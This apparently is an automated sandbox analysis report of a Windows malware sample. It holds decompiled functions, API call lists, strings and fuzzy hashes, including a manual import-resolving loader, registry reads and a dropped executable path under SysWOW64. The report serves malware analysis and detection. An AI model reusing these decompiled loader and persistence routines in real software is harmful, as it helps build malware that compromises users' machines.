0x0040dd53
0x0040dd53
0x0040dd59
0x0040dd62
0x0040dd68
0x0040dd68
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040DD0F
GetCurrentThreadId.KERNEL32 ref: 0040DD20
GetTickCount.KERNEL32 ref: 0040DD2E
Sleep.KERNEL32(00000000,?,73B743E0,?,00000000,0040E538,?,73B743E0,?,00000000,?,0040A445), ref: 0040DD3B
InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
GetCurrentThreadId.KERNEL32 ref: 0040DD53

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
String ID:
API String ID: 3819781495-0
Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E

Uniqueness

Uniqueness Score: -1.00%

Function 0216C52C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 182threadCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0216C69D
InterlockedIncrement.KERNEL32(0216C734), ref: 0216C6FE
CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0216C730), ref: 0216C711
CloseHandle.KERNEL32(00000000,?,0216C730,00413588,02168A60), ref: 0216C71C

Strings

localcfg, xrefs: 0216C52D

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
String ID: localcfg
API String ID: 1026198776-1857712256
Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
Instruction ID: 670c9d9c1646b105772e811f5d8c7c0ac243ffa7c1b801728936a8e6a2ea567c
Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
Instruction Fuzzy Hash: D9515AB1A40B418FC7249F69C98862ABBE9FB48304B50593FE18BC7A90D775F850CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004080C9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004080C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				char _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x412c3c = 0;
				 *0x412c38 = 0;
				if(E00406EC3() != 0) {
					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							E0040EE2A(_t56, 0x4122f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							_t42 =  *0x412c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0040EC2E(_t42);
							 *0x412c3c = 0;
							goto L17;
						} else {
							_t45 = E0040EBCC(_v8);
							_pop(_t56);
							 *0x412c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do {
								_t57 =  *_t49;
								_t49 = _t49 + 1;
							} while (_t57 != 0);
							_t52 = E0040EBCC(_t49 - _t60 + 1);
							_pop(_t56);
							 *0x412c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0040EF00(_t52,  &_v312);
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E00407EE6(_t56);
					L20:
					_t70 = "C:\\Windows\\SysWOW64\\mmeemcze\\kwrovuui.exe"; // 0x43
					if(_t70 != 0) {
						_t71 =  *0x4121a4; // 0x0
						if(_t71 == 0) {
							_t31 = E0040675C("C:\\Windows\\SysWOW64\\mmeemcze\\kwrovuui.exe",  &_v20, 0);
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x4122d4 = E004024C2(_t61, _t63, 0);
								 *0x4121a4 = _t63;
								E0040EC2E(_t61);
							}
						}
					}
					return 1;
				}
			}

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 0040815F
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 00408187
RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 004081BE
RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 00408210

Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,73B743E0,00000000), ref: 0040677E
Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,73B743E0,00000000), ref: 0040679A
Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,73B743E0,00000000), ref: 004067B0
Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,73B743E0,00000000), ref: 004067BF
Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,73B743E0,00000000), ref: 004067D3
Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,73B743E0,00000000), ref: 00406807
Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040681F
Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,73B743E0,00000000), ref: 0040683E
Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040685C

Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48

Strings

C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe, xrefs: 00408225, 0040823A

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
String ID: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe
API String ID: 124786226-2108603222
Opcode ID: b6e9e51b2f0d40eac7d15bbfabee838183b00f86bd29aedfe72e80d5a203e5e5
Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
Opcode Fuzzy Hash: b6e9e51b2f0d40eac7d15bbfabee838183b00f86bd29aedfe72e80d5a203e5e5
Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59

Uniqueness

Uniqueness Score: -1.00%

Function 021671AF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 021671CA
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02167211
LocalFree.KERNEL32(?,?,?), ref: 0216726F
wsprintfA.USER32 ref: 02167286

Strings

|, xrefs: 02167203

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Name$AccountFreeLocalLookupUserwsprintf
String ID: |
API String ID: 2539190677-2343686810
Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
Instruction ID: 69f66bf8cdd716f8fcfaa6939fb4a1bfd29a599e6410066e4ed17a259e2cc057
Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
Instruction Fuzzy Hash: 8E312972940208BFDB01DFA8D848BEE7BA8EF04354F148066B859DB240EB74D6598B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD08, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AD08(CHAR* _a4) {
				char _v132;
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {
						return _t9;
					}
					return lstrcpyA(_t14, "LocalHost");
				}
				_t13 = _a4;
				_t11 = _v132;
				_t12 =  &_v132;
				_t14 = _t13;
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {
						if(_t11 < 0x41 || _t11 > 0x5a) {
							if(_t11 < 0x30 || _t11 > 0x39) {
								if(_t11 != 0x2e) {
									goto L10;
								}
							}
						}
						goto L9;
					} else {
						L9:
						 *_t13 = _t11;
						_t13 =  &(_t13[1]);
						L10:
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				if(_t14[_t9] == 0x2e) {
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;
			}

APIs

gethostname.WS2_32(?,00000080), ref: 0040AD1C
lstrlenA.KERNEL32(00000000), ref: 0040AD60
lstrlenA.KERNEL32(00000000), ref: 0040AD69
lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F

Strings

LocalHost, xrefs: 0040AD79

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$gethostnamelstrcpy
String ID: LocalHost
API String ID: 3695455745-3154191806
Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3CA, Relevance: 7.6, APIs: 5, Instructions: 136
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				int _v32;
				int* _v36;
				char _v68;
				intOrPtr* _t52;
				int _t69;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_v36 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x4128f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0040EE08( &_v68, _a12, _t85);
				_t56 = _t91 + _t85 - 0x40;
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0040F1ED(0, _t56, 0xa);
				_t93 = _t92 + 0x18;
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;
						_v8 = _v8 + 1;
						_v12 = 0;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0040DB2E(_t89);
					_t69 =  *0x4136c4; // 0x0
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					while(1) {
						_v28 = _t89;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {
						_t75 =  *0x4136c4; // 0x0
						E00402544(_t75, _t75, _v32, 0xe4, 0xc8);
						E0040E332(_t82, _t106,  *0x4136c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}

0x0040e3ca
0x0040e3e0
0x0040e3ee
0x0040e528
0x0040e52d
0x0040e52d
0x0040e3f4
0x0040e3f9
0x0040e3fb
0x0040e3fb
0x0040e3fe
0x0040e3fe
0x0040e400
0x0040e401
0x0040e407
0x0040e409
0x0040e40f
0x0040e413
0x0040e413
0x0040e41c
0x0040e421
0x0040e429
0x0040e42c
0x0040e42f
0x0040e43a
0x0040e452
0x0040e51d
0x0040e520
0x00000000
0x0040e458
0x0040e458
0x0040e458
0x0040e45b
0x0040e463
0x0040e469
0x0040e46e
0x0040e484
0x0040e48a
0x00000000
0x00000000
0x0040e491
0x0040e494
0x0040e499
0x0040e4a1
0x00000000
0x00000000
0x0040e4a3
0x0040e4a6
0x0040e4a9
0x0040e4ae
0x0040e4b4
0x0040e4b9
0x0040e4d3
0x00000000
0x00000000
0x0040e4d5
0x0040e4da
0x00000000
0x00000000
0x0040e4dc
0x0040e4df
0x0040e4e1
0x0040e4e6
0x00000000
0x00000000
0x00000000
0x0040e4e6
0x0040e4e8
0x0040e4ea
0x0040e4ec
0x0040e500
0x0040e50e
0x0040e516
0x0040e516
0x00000000
0x0040e4ea

APIs

RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,004122F8), ref: 0040E3E6
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: b5fb4b8fc3318eb2bf5fbd1982c6cd7534101f3087d2227e42e74e88d469657a
Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
Opcode Fuzzy Hash: b5fb4b8fc3318eb2bf5fbd1982c6cd7534101f3087d2227e42e74e88d469657a
Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64

Uniqueness

Uniqueness Score: -1.00%

Function 0216B461, Relevance: 7.6, APIs: 5, Instructions: 131timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0216B503
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0216B512
SystemTimeToFileTime.KERNEL32(?,?), ref: 0216B531
GetTimeZoneInformation.KERNEL32(?), ref: 0216B579
wsprintfA.USER32 ref: 0216B607

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Time$File$Local$InformationSystemZonewsprintf
String ID:
API String ID: 4026320513-0
Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction ID: c242ddca6b3f68467746f440e652a9c3a8a91d4571e5940f7eb506dbbd348a0d
Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction Fuzzy Hash: 38511FB1D4021CAACF18DFD5D8885FEBBB9BF48304F10812AE501B6150E7B94AC9CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00406069, Relevance: 7.6, APIs: 5, Instructions: 121
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(_Unknown_base(*)()* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t55;
				signed int _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr _t69;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr* _t87;
				_Unknown_base(*)()* _t89;

				_t82 = _a4;
				_t47 =  *_t82;
				_t3 = _t82 + 4; // 0x65e85621
				_t69 =  *_t3;
				_v12 = 1;
				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
					_t48 = IsBadReadPtr(_t85, 0x14);
					__eflags = _t48;
					if(_t48 != 0) {
						L29:
						return _v12;
					}
					_t87 = _t85 + 0x10;
					_v8 = _t87;
					while(1) {
						_t50 =  *(_t87 - 4);
						__eflags = _t50;
						if(_t50 == 0) {
							goto L29;
						}
						_t52 = LoadLibraryA(_t50 + _t69);
						_v16 = _t52;
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							L28:
							_t44 =  &_v12;
							 *_t44 = _v12 & 0x00000000;
							__eflags =  *_t44;
							goto L29;
						}
						_t10 = _t82 + 8; // 0x8bfffffa
						_t53 =  *_t10;
						__eflags = _t53;
						if(_t53 != 0) {
							_t14 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBED(_t53, 4 +  *_t14 * 4);
						} else {
							_t11 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBCC(4 +  *_t11 * 4);
						}
						 *(_t82 + 8) = _t54;
						__eflags = _t54;
						if(_t54 == 0) {
							goto L28;
						} else {
							_t18 = _t82 + 0xc; // 0x28408b06
							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
							_t55 =  *(_t87 - 0x10);
							__eflags = _t55;
							if(_t55 == 0) {
								_t89 =  *_t87 + _t69;
								__eflags = _t89;
								_t76 = _t89;
							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89;
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14;
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89;
								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000;
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62;
										goto L21;
									}
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4;
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Read$AddressLibraryLoadProc
String ID:
API String ID: 2438460464-0
Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84

Uniqueness

Uniqueness Score: -1.00%

Function 021662B9, Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 021662EC
LoadLibraryA.KERNEL32(?), ref: 02166313
GetProcAddress.KERNEL32(00000000,?), ref: 0216639A
IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 021663EE

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: HugeRead$AddressLibraryLoadProc
String ID:
API String ID: 3498078134-0
Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
Instruction ID: 54ecc9c63c677785176a16f6edb8fa4fe7728c3f8bbd7183d032042d2c8a1fd8
Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
Instruction Fuzzy Hash: 9B419271A40245EFDB14CF59C888BBEB7B8FF04354F198169E869D7290D738E961CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00402923, Relevance: 7.6, APIs: 5, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;
				_v8 = 0;
				_v16 = 0;
				if(_a4 >= _t37) {
					_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
						_v20 = _t41;
						_v12 = 0;
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;
						}
						while(_t67 < _a4) {
							E0040EE2A(_t76,  &_v296, 0, 0x114);
							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {
								goto L13;
							}
							_t79 = __imp__#15;
							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
							_v28 = _t53;
							_t71 = _t70 + 0xa;
							_v24 = _t71;
							if((_t53 & 0x0000ffff) + _t71 > _a4) {
								goto L13;
							}
							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
							if(_t80 == 0) {
								goto L13;
							}
							E0040EE2A(_t76, _t80, 0, 0x124);
							E0040EE08(_t80,  &_v296, 0x114);
							 *_t80 =  *_t80 & 0x00000000;
							_t67 = _t71 + (_v28 & 0x0000ffff);
							_t62 = _v8;
							_t82 = _t83 + 0x18;
							_v8 = _t80;
							if(_t62 != 0) {
								 *_t62 = _t80;
							} else {
								_v16 = _t80;
							}
							_v12 = _v12 + 1;
							if(_v12 < _v20) {
								continue;
							} else {
								goto L13;
							}
						}
						goto L13;
					}
					_t42 = 0;
					goto L14;
				}
				return 0;
			}

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040E654, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t30;
				CHAR* _t31;
				int _t34;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t47;
				intOrPtr _t51;
				int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;
				char _t59;

				E0040DD05();
				_t41 = 0x4120e8;
				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
				if(_t55 == 0) {
					L9:
					_t53 = E0040EBCC(0x1c);
					if(_t53 != 0) {
						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
						 *((intOrPtr*)(_t53 + 4)) = _a8;
						E00403E8F(0x4120e8, _t53);
						__eflags = _a12;
						if(_a12 == 0) {
							 *(_t53 + 8) = 0;
						} else {
							_t15 = _t53 + 8; // 0x8
							lstrcpynA(_t15, _a12, 0xf);
							 *((char*)(_t53 + 0x17)) = 0;
						}
						L15:
						_t42 = 0x4120e4;
						__eflags =  *0x4120e4 - _t42; // 0x4120e4
						if(__eflags == 0) {
							L22:
							_t47 = 1;
							L11:
							E0040DD69();
							return _t47;
						} else {
							goto L16;
						}
						do {
							L16:
							_t30 =  *((intOrPtr*)(_t53 + 4));
							_t51 =  *_t42;
							__eflags = _t30 - 0xffffffff;
							if(_t30 == 0xffffffff) {
								L18:
								_t20 = _t53 + 8; // 0x8
								_t31 = _t20;
								__eflags =  *_t31;
								if( *_t31 == 0) {
									L20:
									_t52 = _t51 + 0xc;
									__eflags = _t52;
									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
									goto L21;
								}
								_t34 = lstrcmpA(_t51 + 0x10, _t31);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L21;
								}
								goto L20;
							}
							__eflags =  *(_t51 + 0xc) - _t30;
							if( *(_t51 + 0xc) != _t30) {
								goto L21;
							}
							goto L18;
							L21:
							_t42 =  *_t42;
							__eflags =  *_t42 - 0x4120e4;
						} while ( *_t42 != 0x4120e4);
						goto L22;
					}
					_t47 = 0;
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 =  *_t41;
					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
						if(_a12 != 0) {
							_t8 = _t54 + 8; // 0x73b743e8
							__eflags = lstrcmpA(_t8, _a12);
						} else {
							_t59 =  *(_t54 + 8);
						}
						if(_t59 == 0) {
							break;
						} else {
							goto L7;
						}
					}
					L7:
					_t41 =  *_t41;
					_t53 = 0;
				} while ( *_t41 != 0x4120e8);
				if(_t53 != 0) {
					goto L15;
				}
				goto L9;
			}

APIs

Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53

